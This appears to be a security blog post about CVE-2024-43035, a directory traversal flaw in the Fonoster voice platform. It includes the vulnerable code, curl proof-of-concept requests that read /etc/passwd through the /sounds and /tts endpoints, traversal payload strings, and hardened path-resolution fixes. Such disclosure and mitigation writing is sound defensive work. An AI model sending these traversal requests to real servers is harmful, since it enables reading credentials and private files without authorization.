Summary:
CVE-2024-43035 is a critical directory traversal vulnerability discovered in Fonoster, a voice applications platform, affecting version .5.5 up to (but not including) .6.1. Attackers can use this bug to read any file on the server that the Fonoster service can access, simply by sending a crafted HTTP request. The vulnerability lives in the serveFiles function inside mods/voice/src/utils.ts, a function that no longer exists in version .6.1, where the issue is fixed.

This post will break down how this bug happens, show you simple proof-of-concept (PoC) exploit code, point you to the original references, and help you understand how a real-world attack works in plain English.

What is Directory Traversal?

Directory traversal (also called path traversal) lets an attacker move outside the intended directory and access files elsewhere on the system. This is generally done using ../ in a file path.

For example, requesting /sounds/../../../../etc/passwd might give an attacker access to sensitive UNIX password files, if the application server is vulnerable.

How Does CVE-2024-43035 Affect Fonoster?

Fonoster versions from .5.5 before .6.1 serve files based on a user-provided filename without rejecting ../ sequences. The bug lies in two endpoints:

- /sounds/:file
- /tts/:file

The handler is the serveFiles function in mods/voice/src/utils.ts. Attackers can supply filenames like ../../../../etc/passwd to read any file on the disk.

Here’s a simplified example of the vulnerable logic in serveFiles (from .5.5):

```typescript
// Vulnerable serveFiles snippet (simplified)
import * as fs from "fs";
import path from "path";
import type { Request, Response } from "express";

export function serveFiles(directory: string) {
  return (req: Request, res: Response) => {
    const file = req.params.file;                 // attacker-controlled route parameter
    const filePath = path.join(directory, file);  // No path validation!
    if (fs.existsSync(filePath)) {
      res.sendFile(filePath);                     // serves whatever the join resolved to
    } else {
      res.status(404).send("File not found");
    }
  };
}
```

What's wrong here?
The code uses path.join() to combine the directory and the user-supplied file parameter, but it never checks for ../. path.join() normalizes the result, yet normalizing is not confining: each .. segment simply walks one level up and out of the intended directory. A user can supply a "file" value like ../../../some/secret/file.txt and the function will serve that file if it exists.

In version .6.1, this serveFiles utility does not exist—meaning the bug was fixed by removing the vulnerable function and endpoint.

👉 See the GitHub diff (compare) from .5.5 to .6.1
Original NVD entry: CVE-2024-43035

Proof-of-Concept Exploit (PoC)

Let’s try to access the server’s /etc/passwd file (classic Linux target) using a vulnerable Fonoster instance running at http://localhost:300.

```shell
curl 'http://localhost:300/sounds/../../../../etc/passwd'
```

or

```shell
curl 'http://localhost:300/tts/../../../../etc/passwd'
```

What you’ll get:
The server will reply with the full contents of /etc/passwd if it exists and the Fonoster process can read it.

> TIP:
> You can use more or fewer ../ depending on where your sound files directory is rooted.

Real-World Attack Impact

- Sensitive File Leaks: Attackers can read config files, SSH keys, source code, or database credentials.
- Reconnaissance: Directory listings may sometimes be possible, allowing attackers to explore the filesystem.
- Chained Attacks: If attackers read service credentials, they may take over the Fonoster instance entirely.

A safe alternative normalizes the user-supplied name against a fixed root before joining it to the base directory, so ../ sequences cannot climb above the base:

```typescript
import path from "path";

// Example safe join
function safeJoin(base: string, target: string) {
  // Normalizing against "/" collapses leading ".." segments at the root,
  // so the result is always a path relative to base.
  const targetPath = path.posix.normalize('/' + target);
  return path.join(base, targetPath);
}
```
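To make the containment check concrete, here is an added example (not Fonoster's code) that places the vulnerable join beside a hardened resolver and runs both over constructed request names, including percent-encoded and absolute forms. The base directory /opt/fonoster/sounds and the function names are assumptions.

```typescript
import * as path from "path";

// Constructed base directory for the demo (assumption, not Fonoster's real layout).
export const SOUNDS_DIR = "/opt/fonoster/sounds";

// Same shape as the vulnerable serveFiles logic: join with no containment check.
// path.join normalizes the ".." segments, but normalizing is not confining.
export function vulnerableJoin(base: string, file: string): string {
  return path.posix.join(base, file);
}

// Hardened resolver: returns the absolute path to serve, or null when the
// request must be refused (the caller should answer 404 and log the reason).
export function safeResolve(base: string, file: string): string | null {
  let decoded: string;
  try {
    decoded = decodeURIComponent(file); // catches %2e%2e style encodings
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes("\0")) return null;          // NUL can truncate paths in native code
  if (path.posix.isAbsolute(decoded)) return null;  // "/etc/passwd" would replace the base
  const root = path.posix.resolve(base);
  const candidate = path.posix.resolve(root, decoded);
  // Containment check: the resolved file must sit strictly below root.
  if (!candidate.startsWith(root + path.posix.sep)) return null;
  return candidate;
}

// Runs both resolvers over constructed request names so the difference is visible.
// Note: Express already percent-decodes req.params, so the vulnerable handler
// would see the decoded form of the fourth request.
export function demo(): Array<[string, string, string | null]> {
  const requests = ["hello.wav", "sub/../hello.wav", "../../../../etc/passwd",
                    "%2e%2e/%2e%2e/%2e%2e/etc/passwd", "/etc/passwd"];
  return requests.map((r) => [r, vulnerableJoin(SOUNDS_DIR, r), safeResolve(SOUNDS_DIR, r)]);
}
```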

References

- Fonoster GitHub releases
- CVE-2024-43035 NVD page
- Compare Fonoster .5.5 and .6.1
- OWASP Path Traversal Cheat Sheet

Conclusion

CVE-2024-43035 in Fonoster shows how missing input sanitization can put an entire service at risk. Upgrade now and always validate user file paths before using them server-side!

Timeline

Published on: 03/05/2026 00:00:00 UTC
Last modified on: 03/05/2026 20:16:09 UTC